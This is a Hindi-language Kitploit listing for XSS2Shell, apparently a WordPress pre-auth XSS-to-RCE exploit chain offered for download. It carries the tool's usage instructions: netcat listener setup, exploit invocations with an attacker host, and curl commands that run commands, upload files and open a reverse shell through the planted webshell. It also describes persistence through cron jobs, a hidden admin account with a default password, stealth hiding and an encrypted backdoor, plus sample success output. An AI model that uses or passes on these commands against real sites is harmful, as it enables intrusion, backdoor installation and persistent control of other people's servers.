Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
XSS2Shell — WordPress प्री-ऑथ XSS (CVE-2026-64638) का शोषण करके रिमोट कोड निष्पादन प्राप्त करता है, और अधिकृत रेड-टीम अभियानों के लिए पर्सिस्टेंस, फ़ाइल अपलोड, रिवर्स शेल और स्टील्थ विकल्पों सहित AES-एन्क्रिप्टेड बैकडोर वेबशेल स्थापित करता है। | Kitploit
उपकरण/GitHubGitHub/g0d150ne/xss2shell
स्थायित्व तंत्रशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubg0d150ne/xss2shell

XSS2Shell

WordPress प्री-ऑथ XSS (CVE-2026-64638) का शोषण करके रिमोट कोड निष्पादन प्राप्त करता है, और अधिकृत रेड-टीम अभियानों के लिए पर्सिस्टेंस, फ़ाइल अपलोड, रिवर्स शेल और स्टील्थ विकल्पों सहित AES-एन्क्रिप्टेड बैकडोर वेबशेल स्थापित करता है।

10 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

XSS2Shell ULTIMATE v3.0

WordPress प्री-ऑथ XSS → RCE चेन एक्सप्लॉइट
G0D150NE द्वारा विकसित

📌 विशेषताएँ

  • 🔍 XSS और WordPress संस्करण का स्वतः पता लगाएं
  • 🎯 3 मोड: Auto, XSS, Direct
  • 📡 क्रेडेंशियल कैप्चर करने के लिए कॉलबैक सर्वर
  • 🐚 कई निष्पादन विधियों के साथ WebShell
  • 🔄 स्थायित्व (cron job, छिपा हुआ admin, self-replicate)
  • 📁 फ़ाइल अपलोड/डाउनलोड
  • 🖥️ वन-क्लिक रिवर्स शेल
  • 🛡️ स्टील्थ मोड (प्लगइन सूची से छिपाएं)
  • 🔐 AES-256 एन्क्रिप्टेड बैकडोर

📦 इंस्टॉलेशन

root@kitploit:~
# Clone
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# Install dependencies
pip3 install requests beautifulsoup4 cryptography

# Run
python3 poc.py -h

🚀 त्वरित प्रारंभ

1. लिसनर सेटअप करें

root@kitploit:~
# Open terminal for reverse shell
nc -lvnp 4444

2. एक्सप्लॉइट चलाएं

ऑटो मोड (अनुशंसित)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

XSS मोड (बिना क्रेडेंशियल)

root@kitploit:~
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

डायरेक्ट मोड (क्रेडेंशियल के साथ)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 कमांड निष्पादन

WebShell इंस्टॉल होने के बाद:

root@kitploit:~
# Base64 encoded (recommended)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# Plain command
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# Upload file
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 उपयोग उदाहरण

root@kitploit:~
# 1. Auto scan + exploit
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. XSS chain without credentials
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. Custom port & plugin name
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. Change backdoor password
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. Custom callback port
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 कमांड विकल्प

🐚 WebShell सुविधाएँ

सफल एक्सप्लॉइट के बाद:

छिपा हुआ एडमिन बनाया गया:

  • उपयोगकर्ता नाम: sysadmin_{slug}
  • पासवर्ड: {backdoor-pass} (डिफ़ॉल्ट: G0D150NE)

📸 उदाहरण आउटपुट

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 समस्या निवारण

⚠️ अस्वीकरण

केवल शैक्षिक और अधिकृत परीक्षण के लिए।
केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

📞 संपर्क

  • लेखक: G0D150NE
  • CVE: CVE-2026-64638
टूल डाउनलोड करें
विकल्पविवरणडिफ़ॉल्ट
targetलक्षित WordPress URLआवश्यक
-u, --usernameWordPress एडमिन उपयोगकर्ता नाम-
-p, --wp-passWordPress एडमिन पासवर्ड-
--lhostलिसनर IP पता127.0.0.1
--lportलिसनर पोर्ट4444
--modeएक्सप्लॉइट मोड (auto/xss/direct)auto
--slugप्लगइन स्लग नामg0d150ne
--callback-portकॉलबैक सर्वर पोर्ट9090
--backdoor-passबैकडोर पासवर्डG0D150NE
सुविधाकमांड
कमांड निष्पादित करें?b2h=BASE64_CMD
फ़ाइल अपलोड करें-F '[email protected]'
रिवर्स शेल?rev=1
सादा कमांड?cmd=id
एन्क्रिप्टेड बैकडोर?decrypt=AES_DATA
समस्यासमाधान
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
कनेक्शन अस्वीकृतलिसनर जांचें: nc -lvnp 4444
लॉगिन विफलक्रेडेंशियल सत्यापित करें या XSS मोड उपयोग करें
प्लगइन अपलोड विफलअनुमतियां जांचें, अलग स्लग उपयोग करें
आर्ग्युमेंट विरोधwp-pass के लिए -p, बैकडोर के लिए --backdoor-pass उपयोग करें